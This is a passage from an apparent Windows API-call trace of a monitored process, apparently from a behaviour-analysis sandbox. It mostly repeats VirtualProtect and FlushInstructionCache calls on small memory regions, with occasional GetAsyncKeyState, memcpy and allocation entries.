(hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.222] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.223] GetCurrentProcess () returned 0xffffffff [0102.223] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.223] GetCurrentProcess () returned 0xffffffff [0102.223] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.223] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.223] GetCurrentProcess () returned 0xffffffff [0102.223] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.224] GetCurrentProcess () returned 0xffffffff [0102.224] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.224] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.224] GetCurrentProcess () returned 0xffffffff [0102.224] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.224] GetCurrentProcess () returned 0xffffffff [0102.224] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.224] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.225] GetCurrentProcess () returned 0xffffffff [0102.225] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.225] GetCurrentProcess () returned 0xffffffff [0102.225] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.225] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.225] GetCurrentProcess () returned 0xffffffff [0102.226] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.226] GetCurrentProcess () returned 0xffffffff [0102.226] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.226] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.226] GetCurrentProcess () returned 0xffffffff [0102.226] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.226] GetCurrentProcess () returned 0xffffffff [0102.226] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.226] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.227] GetCurrentProcess () returned 0xffffffff [0102.227] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.227] GetCurrentProcess () returned 0xffffffff [0102.227] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.227] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.228] GetCurrentProcess () returned 0xffffffff [0102.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.228] GetCurrentProcess () returned 0xffffffff [0102.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.228] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.228] GetCurrentProcess () returned 0xffffffff [0102.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.228] GetCurrentProcess () returned 0xffffffff [0102.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.228] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.229] GetCurrentProcess () returned 0xffffffff [0102.229] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.230] GetAsyncKeyState (vKey=3) returned 0 [0102.230] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.230] CRetailMalloc_Alloc () returned 0xc986b08 [0102.230] memcpy (in: _Dst=0xcb65188, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.230] memcpy (in: _Dst=0xc986b28, _Src=0x197724, _Size=0x18 | out: _Dst=0xc986b28) returned 0xc986b28 [0102.230] CRetailMalloc_Realloc () returned 0xc986b08 [0102.231] CRetailMalloc_Free () returned 0x1 [0102.231] GetCurrentProcess () returned 0xffffffff [0102.231] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.231] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.231] GetCurrentProcess () returned 0xffffffff [0102.231] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.231] GetCurrentProcess () returned 0xffffffff [0102.231] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.231] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.232] GetCurrentProcess () returned 0xffffffff [0102.232] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.232] GetCurrentProcess () returned 0xffffffff [0102.232] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.232] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.233] GetCurrentProcess () returned 0xffffffff [0102.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.233] GetCurrentProcess () returned 0xffffffff [0102.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.233] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.233] GetCurrentProcess () returned 0xffffffff [0102.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.234] GetCurrentProcess () returned 0xffffffff [0102.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.234] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.234] GetCurrentProcess () returned 0xffffffff [0102.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.234] GetCurrentProcess () returned 0xffffffff [0102.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.234] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.235] GetCurrentProcess () returned 0xffffffff [0102.235] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.235] GetCurrentProcess () returned 0xffffffff [0102.235] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.235] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.237] GetCurrentProcess () returned 0xffffffff [0102.237] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.237] GetCurrentProcess () returned 0xffffffff [0102.237] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.237] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.238] GetCurrentProcess () returned 0xffffffff [0102.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.238] GetCurrentProcess () returned 0xffffffff [0102.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.238] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.238] GetCurrentProcess () returned 0xffffffff [0102.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.239] GetCurrentProcess () returned 0xffffffff [0102.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.239] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.239] GetCurrentProcess () returned 0xffffffff [0102.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.239] GetCurrentProcess () returned 0xffffffff [0102.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.239] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.240] GetCurrentProcess () returned 0xffffffff [0102.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.240] GetCurrentProcess () returned 0xffffffff [0102.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.240] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.241] GetCurrentProcess () returned 0xffffffff [0102.241] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.241] GetCurrentProcess () returned 0xffffffff [0102.241] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.241] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.241] GetCurrentProcess () returned 0xffffffff [0102.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.242] GetCurrentProcess () returned 0xffffffff [0102.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.242] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.242] GetCurrentProcess () returned 0xffffffff [0102.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.242] GetCurrentProcess () returned 0xffffffff [0102.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.242] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.243] GetCurrentProcess () returned 0xffffffff [0102.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.243] GetCurrentProcess () returned 0xffffffff [0102.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.243] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.244] GetCurrentProcess () returned 0xffffffff [0102.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.244] GetCurrentProcess () returned 0xffffffff [0102.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.244] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.244] GetCurrentProcess () returned 0xffffffff [0102.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.244] GetCurrentProcess () returned 0xffffffff [0102.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.245] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.245] GetCurrentProcess () returned 0xffffffff [0102.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.245] GetCurrentProcess () returned 0xffffffff [0102.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.245] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.246] GetCurrentProcess () returned 0xffffffff [0102.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.246] GetCurrentProcess () returned 0xffffffff [0102.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.246] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.247] GetCurrentProcess () returned 0xffffffff [0102.247] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.247] GetCurrentProcess () returned 0xffffffff [0102.247] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.247] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.248] GetCurrentProcess () returned 0xffffffff [0102.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.248] GetCurrentProcess () returned 0xffffffff [0102.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.248] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.249] GetCurrentProcess () returned 0xffffffff [0102.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.249] GetCurrentProcess () returned 0xffffffff [0102.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.249] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.250] GetCurrentProcess () returned 0xffffffff [0102.250] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.250] GetCurrentProcess () returned 0xffffffff [0102.250] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.251] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.251] GetCurrentProcess () returned 0xffffffff [0102.251] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.252] GetCurrentProcess () returned 0xffffffff [0102.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.252] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.252] GetCurrentProcess () returned 0xffffffff [0102.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.252] GetCurrentProcess () returned 0xffffffff [0102.253] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.253] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.254] GetCurrentProcess () returned 0xffffffff [0102.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.254] GetCurrentProcess () returned 0xffffffff [0102.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.254] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.255] GetCurrentProcess () returned 0xffffffff [0102.255] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.255] GetCurrentProcess () returned 0xffffffff [0102.255] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.255] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.256] GetCurrentProcess () returned 0xffffffff [0102.256] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.256] GetCurrentProcess () returned 0xffffffff [0102.256] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.256] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.256] GetCurrentProcess () returned 0xffffffff [0102.256] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.256] GetCurrentProcess () returned 0xffffffff [0102.256] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.256] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.257] GetCurrentProcess () returned 0xffffffff [0102.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.257] GetCurrentProcess () returned 0xffffffff [0102.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.257] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.258] GetCurrentProcess () returned 0xffffffff [0102.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.259] GetAsyncKeyState (vKey=3) returned 0 [0102.259] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.259] CRetailMalloc_Alloc () returned 0xc986b68 [0102.259] memcpy (in: _Dst=0xcb65188, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.259] memcpy (in: _Dst=0xc986b88, _Src=0x197724, _Size=0x18 | out: _Dst=0xc986b88) returned 0xc986b88 [0102.259] CRetailMalloc_Realloc () returned 0xc986b68 [0102.259] CRetailMalloc_Free () returned 0x1 [0102.259] GetCurrentProcess () returned 0xffffffff [0102.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.259] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.260] GetCurrentProcess () returned 0xffffffff [0102.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.260] GetCurrentProcess () returned 0xffffffff [0102.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.260] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.261] GetCurrentProcess () returned 0xffffffff [0102.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.261] GetCurrentProcess () returned 0xffffffff [0102.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.261] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.261] GetCurrentProcess () returned 0xffffffff [0102.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.261] GetCurrentProcess () returned 0xffffffff [0102.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.262] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.262] GetCurrentProcess () returned 0xffffffff [0102.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.262] GetCurrentProcess () returned 0xffffffff [0102.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.262] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.263] GetCurrentProcess () returned 0xffffffff [0102.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.263] GetCurrentProcess () returned 0xffffffff [0102.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.263] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.264] GetCurrentProcess () returned 0xffffffff [0102.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.264] GetCurrentProcess () returned 0xffffffff [0102.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.264] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.264] GetCurrentProcess () returned 0xffffffff [0102.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.265] GetCurrentProcess () returned 0xffffffff [0102.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.265] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.265] GetCurrentProcess () returned 0xffffffff [0102.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.265] GetCurrentProcess () returned 0xffffffff [0102.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.265] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.266] GetCurrentProcess () returned 0xffffffff [0102.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.266] GetCurrentProcess () returned 0xffffffff [0102.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.266] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.267] GetCurrentProcess () returned 0xffffffff [0102.267] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.267] GetCurrentProcess () returned 0xffffffff [0102.267] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.267] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.268] GetCurrentProcess () returned 0xffffffff [0102.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.268] GetCurrentProcess () returned 0xffffffff [0102.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.268] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.268] GetCurrentProcess () returned 0xffffffff [0102.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.268] GetCurrentProcess () returned 0xffffffff [0102.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.268] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.269] GetCurrentProcess () returned 0xffffffff [0102.269] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.269] GetCurrentProcess () returned 0xffffffff [0102.269] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.269] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.270] GetCurrentProcess () returned 0xffffffff [0102.270] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.270] GetCurrentProcess () returned 0xffffffff [0102.270] 